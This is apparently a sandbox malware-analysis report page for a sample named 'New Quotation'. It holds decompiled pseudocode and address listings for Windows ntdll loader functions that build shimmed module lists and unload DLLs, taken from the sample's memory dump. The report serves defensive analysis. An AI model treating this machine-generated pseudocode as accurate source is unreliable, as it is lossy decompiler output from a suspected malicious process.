                                                                                                                                                                                          0x1d82e60f
                                                                                                                                                                                          0x1d82e60f
                                                                                                                                                                                          0x1d82e618
                                                                                                                                                                                          0x1d82e621
                                                                                                                                                                                          0x1d82e622
                                                                                                                                                                                          0x1d82e624
                                                                                                                                                                                          0x1d82e62c
                                                                                                                                                                                          0x1d82e62d
                                                                                                                                                                                          0x1d82e631
                                                                                                                                                                                          0x1d82e631
                                                                                                                                                                                          0x1d82e5f7
                                                                                                                                                                                          0x1d7cf9bd
                                                                                                                                                                                          0x1d7cf9c2
                                                                                                                                                                                          0x1d7cf9ce
                                                                                                                                                                                          0x1d82e644
                                                                                                                                                                                          0x1d7cf9d4
                                                                                                                                                                                          0x1d7cf9d4
                                                                                                                                                                                          0x1d7cf9d4
                                                                                                                                                                                          0x1d7cf9d9
                                                                                                                                                                                          0x1d82e64b
                                                                                                                                                                                          0x1d82e650
                                                                                                                                                                                          0x1d82e652
                                                                                                                                                                                          0x1d82e65d
                                                                                                                                                                                          0x1d82e65d
                                                                                                                                                                                          0x1d82e65d
                                                                                                                                                                                          0x1d82e666
                                                                                                                                                                                          0x1d82e66f
                                                                                                                                                                                          0x1d82e670
                                                                                                                                                                                          0x1d82e672
                                                                                                                                                                                          0x1d82e67a
                                                                                                                                                                                          0x1d82e67b
                                                                                                                                                                                          0x1d82e67f
                                                                                                                                                                                          0x1d82e67f
                                                                                                                                                                                          0x1d7cf9e6
                                                                                                                                                                                          0x1d82e692
                                                                                                                                                                                          0x1d7cf9ec
                                                                                                                                                                                          0x1d7cf9ec
                                                                                                                                                                                          0x1d7cf9ec
                                                                                                                                                                                          0x1d7cf9f4
                                                                                                                                                                                          0x1d7cfa3d
                                                                                                                                                                                          0x1d7cfa3d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cf9f4
                                                                                                                                                                                          0x1d7cf999
                                                                                                                                                                                          0x1d7cf918

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                          • API String ID: 3446177414-3610490719
                                                                                                                                                                                          • Opcode ID: c0a4fee9192cf54150b9385e51ec55158a4292e396d0e7f73cb96b500a8bf00a
                                                                                                                                                                                          • Instruction ID: e780e18fb9f0a4fc098640607b5e3dac60d1cc3809eb227cbe9f5b479f026f2e
                                                                                                                                                                                          • Opcode Fuzzy Hash: c0a4fee9192cf54150b9385e51ec55158a4292e396d0e7f73cb96b500a8bf00a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B912672209752EFD716CB24C884B6EF7A5BF84B60F01445AFA458B291DB34F885C793
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7F0AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                                                                          			E1D7F0AEB(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t67;
				signed int _t70;
				signed int _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t93;
				signed char _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t111;
				signed int _t113;
				intOrPtr* _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				intOrPtr* _t122;
				signed int _t126;
				void* _t130;
				void* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t138;
				void* _t139;
				void* _t140;
				void* _t141;

				_t134 = 0;
				_t108 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t141 =  *0x1d8c68d8 - _t134; // 0x0
				if(_t141 != 0) {
					_v20 = 1;
				}
				if( *0x1d8c65f9 == 0) {
					_t136 =  *((intOrPtr*)(_t108 + 4));
					while(1) {
						__eflags = _t136 - _t108;
						if(_t136 == _t108) {
							break;
						}
						_t110 = _t136 - 0x54;
						E1D807550(_t136 - 0x54);
						_t136 =  *((intOrPtr*)(_t136 + 4));
					}
					goto L2;
				} else {
					L2:
					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
					E1D7DFED0(0x1d8c32d8);
					if( *0x1d8c65f0 != 0) {
						_t126 =  *0x7ffe0330;
						_t135 =  *0x1d8c9218; // 0x0
						_t111 = 0x20;
						_t110 = _t111 - (_t126 & 0x0000001f);
						asm("ror edi, cl");
						_t134 = _t135 ^ _t126;
					}
					_t137 = 0;
					_t67 =  *((intOrPtr*)(_t108 + 4));
					_v36 = 0;
					_v32 = _t67;
					if(_t67 == _t108) {
						L11:
						_push(0x1d8c32d8);
						E1D7DE740(_t110);
						return _t137;
					} else {
						_t113 = _v16 & 0x00000100;
						_v16 = _t113;
						do {
							_t138 = _t67 - 0x54;
							if(_t113 != 0) {
								_t110 = _t138;
								_t70 = E1D7C6DA6(_t138);
								_v36 = _t70;
								__eflags = _t70;
								if(_t70 < 0) {
									break;
								}
							}
							_t114 = _t138;
							E1D7D98DE(_t138, 0);
							if(_t134 != 0) {
								__eflags =  *0x1d8c65f8;
								if(__eflags == 0) {
									_t114 = _t134;
									 *0x1d8c91e0(_t138);
									 *_t134();
									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
								}
							}
							_t148 = _v20;
							if(_v20 == 0) {
								_t76 =  *(_t138 + 0x28);
								_t114 = _t76;
								_t130 = 0x10;
								_v8 = _t76;
								if(E1D7F1C7D(_t76, _t130, _t148) != 0) {
									_t117 = _v8;
									_t31 = _t117 + 2; // 0x2
									_t131 = _t31;
									do {
										_t78 =  *_t117;
										_t117 = _t117 + 2;
										__eflags = _t78 - _v12;
									} while (_t78 != _v12);
									_t114 = _t117 - _t131 >> 1;
									__eflags =  *0x1d8c68d8;
									if( *0x1d8c68d8 == 0) {
										_t33 = _t114 + 2; // 0x0
										_t79 = _t33;
									} else {
										_t104 =  *0x1d8c5d4c; // 0x0
										_t79 = _t104 + 1 + _t114;
									}
									_v28 = _t79;
									_t132 = E1D7E5D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t79 + _t79);
									_v24 = _t132;
									__eflags = _t132;
									if(_t132 != 0) {
										_t119 =  *0x1d8c68d8; // 0x0
										__eflags = _t119;
										if(_t119 == 0) {
											_t120 = _v8;
											_t52 = _t120 + 2; // 0x2
											_v40 = _t52;
											do {
												_t84 =  *_t120;
												_t120 = _t120 + 2;
												__eflags = _t84 - _v12;
											} while (_t84 != _v12);
											_t121 = _t120 - _v40;
											__eflags = _t121;
											_t114 = _t121 >> 1;
											E1D8188C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
											_t139 = _t139 + 0xc;
											L39:
											 *0x1d8c68d8 = _v24;
											 *0x1d8c5d4c = _v28;
											goto L9;
										}
										_t89 =  *0x1d8c5d4c; // 0x0
										_t90 = _t89 + _t89;
										__eflags = _t90;
										_v40 = _t90;
										E1D8188C0(_t132, _t119, _t90);
										_t133 = _v8;
										_t140 = _t139 + 0xc;
										_t122 = _v8;
										_t43 = _t122 + 2; // 0x2
										_v8 = _t43;
										do {
											_t93 =  *_t122;
											_t122 = _t122 + 2;
											__eflags = _t93 - _v12;
										} while (_t93 != _v12);
										_t114 = _v40 + 2;
										E1D8188C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
										_t139 = _t140 + 0xc;
										E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d8c68d8);
										goto L39;
									} else {
										_t101 =  *0x1d8c37c0; // 0x0
										__eflags = _t101 & 0x00000003;
										if((_t101 & 0x00000003) != 0) {
											_push("Failed to allocated memory for shimmed module list\n");
											__eflags = 0;
											_push(0);
											_push("LdrpCheckModule");
											_push(0xaf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E1D84E692();
											_t101 =  *0x1d8c37c0; // 0x0
											_t139 = _t139 + 0x14;
										}
										__eflags = _t101 & 0x00000010;
										if((_t101 & 0x00000010) != 0) {
											asm("int3");
										}
										goto L9;
									}
								}
							}
							L9:
							E1D7F0C2C(_t138, 1, _t114);
							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
							E1D7EDF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
							_t113 = _v16;
							_t67 =  *((intOrPtr*)(_v32 + 4));
							_v32 = _t67;
						} while (_t67 != _t108);
						_t137 = _v36;
						goto L11;
					}
				}
			}











































                                                                                                                                                                                          0x1d7f0af6
                                                                                                                                                                                          0x1d7f0af8
                                                                                                                                                                                          0x1d7f0afa
                                                                                                                                                                                          0x1d7f0afd
                                                                                                                                                                                          0x1d7f0b00
                                                                                                                                                                                          0x1d7f0b06
                                                                                                                                                                                          0x1d839ea5
                                                                                                                                                                                          0x1d839ea5
                                                                                                                                                                                          0x1d7f0b13
                                                                                                                                                                                          0x1d7f0bd3
                                                                                                                                                                                          0x1d7f0be3
                                                                                                                                                                                          0x1d7f0be3
                                                                                                                                                                                          0x1d7f0be5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0bd8
                                                                                                                                                                                          0x1d7f0bdb
                                                                                                                                                                                          0x1d7f0be0
                                                                                                                                                                                          0x1d7f0be0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0b19
                                                                                                                                                                                          0x1d7f0b19
                                                                                                                                                                                          0x1d7f0b27
                                                                                                                                                                                          0x1d7f0b2a
                                                                                                                                                                                          0x1d7f0b36
                                                                                                                                                                                          0x1d7f0c0d
                                                                                                                                                                                          0x1d7f0c15
                                                                                                                                                                                          0x1d7f0c20
                                                                                                                                                                                          0x1d7f0c21
                                                                                                                                                                                          0x1d7f0c23
                                                                                                                                                                                          0x1d7f0c25
                                                                                                                                                                                          0x1d7f0c25
                                                                                                                                                                                          0x1d7f0b3e
                                                                                                                                                                                          0x1d7f0b40
                                                                                                                                                                                          0x1d7f0b43
                                                                                                                                                                                          0x1d7f0b46
                                                                                                                                                                                          0x1d7f0b4b
                                                                                                                                                                                          0x1d7f0bc2
                                                                                                                                                                                          0x1d7f0bc2
                                                                                                                                                                                          0x1d7f0bc7
                                                                                                                                                                                          0x1d7f0bd2
                                                                                                                                                                                          0x1d7f0b4d
                                                                                                                                                                                          0x1d7f0b50
                                                                                                                                                                                          0x1d7f0b56
                                                                                                                                                                                          0x1d7f0b59
                                                                                                                                                                                          0x1d7f0b59
                                                                                                                                                                                          0x1d7f0b5e
                                                                                                                                                                                          0x1d839eb1
                                                                                                                                                                                          0x1d839eb3
                                                                                                                                                                                          0x1d839eb8
                                                                                                                                                                                          0x1d839ebb
                                                                                                                                                                                          0x1d839ebd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839ec3
                                                                                                                                                                                          0x1d7f0b66
                                                                                                                                                                                          0x1d7f0b69
                                                                                                                                                                                          0x1d7f0b70
                                                                                                                                                                                          0x1d7f0bec
                                                                                                                                                                                          0x1d7f0bf3
                                                                                                                                                                                          0x1d7f0bfa
                                                                                                                                                                                          0x1d7f0bfc
                                                                                                                                                                                          0x1d7f0c02
                                                                                                                                                                                          0x1d7f0c04
                                                                                                                                                                                          0x1d7f0c04
                                                                                                                                                                                          0x1d7f0bf3
                                                                                                                                                                                          0x1d7f0b72
                                                                                                                                                                                          0x1d7f0b76
                                                                                                                                                                                          0x1d7f0b78
                                                                                                                                                                                          0x1d7f0b7b
                                                                                                                                                                                          0x1d7f0b7f
                                                                                                                                                                                          0x1d7f0b80
                                                                                                                                                                                          0x1d7f0b8a
                                                                                                                                                                                          0x1d839ec8
                                                                                                                                                                                          0x1d839ecb
                                                                                                                                                                                          0x1d839ecb
                                                                                                                                                                                          0x1d839ece
                                                                                                                                                                                          0x1d839ece
                                                                                                                                                                                          0x1d839ed1
                                                                                                                                                                                          0x1d839ed4
                                                                                                                                                                                          0x1d839ed4
                                                                                                                                                                                          0x1d839edc
                                                                                                                                                                                          0x1d839ede
                                                                                                                                                                                          0x1d839ee5
                                                                                                                                                                                          0x1d839ef1
                                                                                                                                                                                          0x1d839ef1
                                                                                                                                                                                          0x1d839ee7
                                                                                                                                                                                          0x1d839ee7
                                                                                                                                                                                          0x1d839eed
                                                                                                                                                                                          0x1d839eed
                                                                                                                                                                                          0x1d839ef4
                                                                                                                                                                                          0x1d839f0a
                                                                                                                                                                                          0x1d839f0c
                                                                                                                                                                                          0x1d839f0f
                                                                                                                                                                                          0x1d839f11
                                                                                                                                                                                          0x1d839f4e
                                                                                                                                                                                          0x1d839f54
                                                                                                                                                                                          0x1d839f56
                                                                                                                                                                                          0x1d839fbb
                                                                                                                                                                                          0x1d839fbe
                                                                                                                                                                                          0x1d839fc1
                                                                                                                                                                                          0x1d839fc4
                                                                                                                                                                                          0x1d839fc4
                                                                                                                                                                                          0x1d839fc7
                                                                                                                                                                                          0x1d839fca
                                                                                                                                                                                          0x1d839fca
                                                                                                                                                                                          0x1d839fd0
                                                                                                                                                                                          0x1d839fd0
                                                                                                                                                                                          0x1d839fd3
                                                                                                                                                                                          0x1d839fdd
                                                                                                                                                                                          0x1d839fe2
                                                                                                                                                                                          0x1d839fe5
                                                                                                                                                                                          0x1d839fe8
                                                                                                                                                                                          0x1d839ff0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839ff0
                                                                                                                                                                                          0x1d839f58
                                                                                                                                                                                          0x1d839f5d
                                                                                                                                                                                          0x1d839f5d
                                                                                                                                                                                          0x1d839f62
                                                                                                                                                                                          0x1d839f65
                                                                                                                                                                                          0x1d839f6a
                                                                                                                                                                                          0x1d839f6d
                                                                                                                                                                                          0x1d839f70
                                                                                                                                                                                          0x1d839f72
                                                                                                                                                                                          0x1d839f75
                                                                                                                                                                                          0x1d839f78
                                                                                                                                                                                          0x1d839f78
                                                                                                                                                                                          0x1d839f7b
                                                                                                                                                                                          0x1d839f7e
                                                                                                                                                                                          0x1d839f7e
                                                                                                                                                                                          0x1d839f93
                                                                                                                                                                                          0x1d839f9a
                                                                                                                                                                                          0x1d839f9f
                                                                                                                                                                                          0x1d839fb4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839f13
                                                                                                                                                                                          0x1d839f13
                                                                                                                                                                                          0x1d839f18
                                                                                                                                                                                          0x1d839f1a
                                                                                                                                                                                          0x1d839f1c
                                                                                                                                                                                          0x1d839f21
                                                                                                                                                                                          0x1d839f23
                                                                                                                                                                                          0x1d839f24
                                                                                                                                                                                          0x1d839f29
                                                                                                                                                                                          0x1d839f2e
                                                                                                                                                                                          0x1d839f33
                                                                                                                                                                                          0x1d839f38
                                                                                                                                                                                          0x1d839f3d
                                                                                                                                                                                          0x1d839f3d
                                                                                                                                                                                          0x1d839f40
                                                                                                                                                                                          0x1d839f42
                                                                                                                                                                                          0x1d839f48
                                                                                                                                                                                          0x1d839f48
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839f42
                                                                                                                                                                                          0x1d839f11
                                                                                                                                                                                          0x1d7f0b8a
                                                                                                                                                                                          0x1d7f0b90
                                                                                                                                                                                          0x1d7f0b96
                                                                                                                                                                                          0x1d7f0ba1
                                                                                                                                                                                          0x1d7f0baa
                                                                                                                                                                                          0x1d7f0bb2
                                                                                                                                                                                          0x1d7f0bb5
                                                                                                                                                                                          0x1d7f0bb8
                                                                                                                                                                                          0x1d7f0bbb
                                                                                                                                                                                          0x1d7f0bbf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f0bbf
                                                                                                                                                                                          0x1d7f0b4b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • LdrpCheckModule, xrefs: 1D839F24
                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 1D839F2E
                                                                                                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 1D839F1C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                          • API String ID: 3446177414-161242083
                                                                                                                                                                                          • Opcode ID: de5632758b34d1952b8144c04a4604dcd8c1196f740e94d9906d2c1c1d5b889b
                                                                                                                                                                                          • Instruction ID: b4a187b8535144e3619b23e453847b5d26d38526ccb84193bc85989b4829f0ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: de5632758b34d1952b8144c04a4604dcd8c1196f740e94d9906d2c1c1d5b889b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6871F074A00255DFCB15DF68CC85BFEB7F0FB48618F15806AE919A7360E334AA41CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7F9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 66%
                                                                                                                                                                                          			E1D7F9723(signed int __ecx, void* __edx) {
				char _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t49;
				signed int _t50;
				signed int _t60;
				signed int _t69;
				signed int _t70;
				intOrPtr _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				signed int* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				intOrPtr* _t105;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t110 = __ecx;
				_v16 =  *[fs:0x30];
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L9:
					_t13 = _t110 + 0x20;
					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
					__eflags =  *_t13;
					E1D7FA4E3(_t82, _t87, _t103, _t110,  *_t13);
					L10:
					__eflags =  *0x1d8c65f0 - _t82; // 0x0
					if(__eflags != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x1d8c9214; // 0x0
						_t88 = 0x20;
						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E1D7DFED0(0x1d8c32d8);
					_t49 =  *_t110;
					while(1) {
						_v20 = _t49;
						__eflags = _t49 - _t110;
						if(_t49 == _t110) {
							break;
						}
						_t16 = _t49 - 0x54; // 0x773f36a0
						_t108 = _t16;
						__eflags =  *(_t108 + 0x34) & 0x00000008;
						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							E1D7F0C2C(_t108, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x1d8c91e0(_t108);
								 *_t82();
							}
							_t87 = _t108;
							E1D7D98DE(_t87, 1);
							_t79 = _v24;
							__eflags =  *(_t79 + 0x68) & 0x00000100;
							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
								_t87 = _t108;
								E1D8585AA(_t87);
							}
						}
						__eflags =  *0x1d8c37c0 & 0x00000005;
						if(__eflags != 0) {
							_t43 = _t108 + 0x24; // -48
							E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t108 + 0x18)));
						E1D7FA390(_t82, _t87, _t108, _t110, __eflags);
						_t49 =  *_v28;
					}
					_push(0x1d8c32d8);
					_t50 = E1D7DE740(_t87);
					while(1) {
						L3:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t104 =  *_t89;
						__eflags = _t104 - _t89;
						if(_t104 != _t89) {
							_t50 =  *_t104;
							 *_t89 = _t50;
						} else {
							_t32 = _t110 + 0x18;
							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
							__eflags =  *_t32;
						}
						__eflags = _t104;
						if(_t104 == 0) {
							break;
						} else {
							L1D7E2330(_t50, 0x1d8c6668);
							_t86 =  *((intOrPtr*)(_t104 + 4));
							_t35 = _t104 + 8; // 0x8
							_t100 = _t35;
							_t93 =  *(_t86 + 0x1c);
							_t60 =  *_t93;
							_v16 = _t60;
							__eflags = _t60 - _t100;
							if(_t60 == _t100) {
								L27:
								 *_t93 =  *_t100;
								__eflags =  *(_t86 + 0x1c) - _t100;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									_t69 =  ~(_t93 - _t100) & _t93;
									__eflags = _t69;
									 *(_t86 + 0x1c) = _t69;
								}
								_push( &_v4);
								E1D7ED963(_t86, _t86, 0, _t104, _t110, __eflags);
								E1D7E24D0(0x1d8c6668);
								__eflags = _v12;
								if(_v12 != 0) {
									E1D7F9723(_t86, 0);
								}
								_t50 = E1D7E3BC0( *0x1d8c5d74, 0, _t104);
								continue;
							}
							_t112 = _t60;
							do {
								_t70 =  *_t112;
								_t93 = _t112;
								_t112 = _t70;
								__eflags = _t70 - _t100;
							} while (_t70 != _t100);
							_t110 = _v8;
							goto L27;
						}
					}
					_t105 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t105 == _t110) {
						L8:
						return _t50;
					} else {
						goto L5;
					}
					do {
						L5:
						_t85 =  *_t105;
						_t107 = _t105 + 0xffffffac;
						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
						E1D7F9938(L1D7E2330(_t50, 0x1d8c6668), _t107);
						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
							_t28 = _t107 + 0x74; // -56
							L1D7F9B40(_t85, _t107, _t110, 0x1d8c67ac);
							_t29 = _t107 + 0x68; // -68
							L1D7F9B40(_t85, _t107, _t110, 0x1d8c67a4);
							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
						}
						E1D7E24D0(0x1d8c6668);
						if( *0x1d8c5d70 != 0) {
							E1D80680F(_t107);
						}
						_t50 = E1D7ED3E1(_t85, _t107, _t110);
						_t105 = _t85;
					} while (_t85 != _t110);
					goto L8;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L10;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
					goto L9;
				}
				goto L3;
			}








































                                                                                                                                                                                          0x1d7f9723
                                                                                                                                                                                          0x1d7f972b
                                                                                                                                                                                          0x1d7f9736
                                                                                                                                                                                          0x1d7f9738
                                                                                                                                                                                          0x1d7f973c
                                                                                                                                                                                          0x1d7f973e
                                                                                                                                                                                          0x1d7f9742
                                                                                                                                                                                          0x1d7f9747
                                                                                                                                                                                          0x1d7f97bc
                                                                                                                                                                                          0x1d7f97bc
                                                                                                                                                                                          0x1d7f97bc
                                                                                                                                                                                          0x1d7f97bc
                                                                                                                                                                                          0x1d7f97c0
                                                                                                                                                                                          0x1d7f97c5
                                                                                                                                                                                          0x1d7f97c5
                                                                                                                                                                                          0x1d7f97cb
                                                                                                                                                                                          0x1d7f9900
                                                                                                                                                                                          0x1d7f9908
                                                                                                                                                                                          0x1d7f9913
                                                                                                                                                                                          0x1d7f9914
                                                                                                                                                                                          0x1d7f9916
                                                                                                                                                                                          0x1d7f9918
                                                                                                                                                                                          0x1d7f9918
                                                                                                                                                                                          0x1d7f97d6
                                                                                                                                                                                          0x1d7f97db
                                                                                                                                                                                          0x1d7f97dd
                                                                                                                                                                                          0x1d7f97dd
                                                                                                                                                                                          0x1d7f97e1
                                                                                                                                                                                          0x1d7f97e3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f97e5
                                                                                                                                                                                          0x1d7f97e5
                                                                                                                                                                                          0x1d7f97e8
                                                                                                                                                                                          0x1d7f97ec
                                                                                                                                                                                          0x1d7f97ee
                                                                                                                                                                                          0x1d7f97f1
                                                                                                                                                                                          0x1d7f97f4
                                                                                                                                                                                          0x1d7f97f9
                                                                                                                                                                                          0x1d7f97fb
                                                                                                                                                                                          0x1d7f9922
                                                                                                                                                                                          0x1d7f9928
                                                                                                                                                                                          0x1d7f9928
                                                                                                                                                                                          0x1d7f9803
                                                                                                                                                                                          0x1d7f9805
                                                                                                                                                                                          0x1d7f980a
                                                                                                                                                                                          0x1d7f980e
                                                                                                                                                                                          0x1d7f9815
                                                                                                                                                                                          0x1d83dade
                                                                                                                                                                                          0x1d83dae0
                                                                                                                                                                                          0x1d83dae0
                                                                                                                                                                                          0x1d7f9815
                                                                                                                                                                                          0x1d7f981b
                                                                                                                                                                                          0x1d7f9822
                                                                                                                                                                                          0x1d83daea
                                                                                                                                                                                          0x1d83db04
                                                                                                                                                                                          0x1d83db09
                                                                                                                                                                                          0x1d83db09
                                                                                                                                                                                          0x1d7f9828
                                                                                                                                                                                          0x1d7f982a
                                                                                                                                                                                          0x1d7f982d
                                                                                                                                                                                          0x1d7f9836
                                                                                                                                                                                          0x1d7f9836
                                                                                                                                                                                          0x1d7f983a
                                                                                                                                                                                          0x1d7f983f
                                                                                                                                                                                          0x1d7f9755
                                                                                                                                                                                          0x1d7f9755
                                                                                                                                                                                          0x1d7f9755
                                                                                                                                                                                          0x1d7f975a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f986e
                                                                                                                                                                                          0x1d7f9870
                                                                                                                                                                                          0x1d7f9872
                                                                                                                                                                                          0x1d7f992f
                                                                                                                                                                                          0x1d7f9931
                                                                                                                                                                                          0x1d7f9878
                                                                                                                                                                                          0x1d7f9878
                                                                                                                                                                                          0x1d7f9878
                                                                                                                                                                                          0x1d7f9878
                                                                                                                                                                                          0x1d7f9878
                                                                                                                                                                                          0x1d7f987c
                                                                                                                                                                                          0x1d7f987e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f9884
                                                                                                                                                                                          0x1d7f9889
                                                                                                                                                                                          0x1d7f988e
                                                                                                                                                                                          0x1d7f9891
                                                                                                                                                                                          0x1d7f9891
                                                                                                                                                                                          0x1d7f9894
                                                                                                                                                                                          0x1d7f9897
                                                                                                                                                                                          0x1d7f9899
                                                                                                                                                                                          0x1d7f989d
                                                                                                                                                                                          0x1d7f989f
                                                                                                                                                                                          0x1d7f98b1
                                                                                                                                                                                          0x1d7f98b3
                                                                                                                                                                                          0x1d7f98b5
                                                                                                                                                                                          0x1d7f98b8
                                                                                                                                                                                          0x1d7f98c0
                                                                                                                                                                                          0x1d7f98c2
                                                                                                                                                                                          0x1d7f98c2
                                                                                                                                                                                          0x1d7f98c4
                                                                                                                                                                                          0x1d7f98c4
                                                                                                                                                                                          0x1d7f98cd
                                                                                                                                                                                          0x1d7f98d0
                                                                                                                                                                                          0x1d7f98da
                                                                                                                                                                                          0x1d7f98df
                                                                                                                                                                                          0x1d7f98e4
                                                                                                                                                                                          0x1d7f98e8
                                                                                                                                                                                          0x1d7f98e8
                                                                                                                                                                                          0x1d7f98f6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f98f6
                                                                                                                                                                                          0x1d7f98a1
                                                                                                                                                                                          0x1d7f98a3
                                                                                                                                                                                          0x1d7f98a3
                                                                                                                                                                                          0x1d7f98a5
                                                                                                                                                                                          0x1d7f98a7
                                                                                                                                                                                          0x1d7f98a9
                                                                                                                                                                                          0x1d7f98a9
                                                                                                                                                                                          0x1d7f98ad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7f98ad
                                                                                                                                                                                          0x1d7f987e
                                                                                                                                                                                          0x1d7f9760
                                                                                                                                                                                          0x1d7f9762
                                                                                                                                                                                          0x1d7f976b
                                                                                                                                                                                          0x1d7f97b5
                                                                                                                                                                                          0x1d7f97bb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
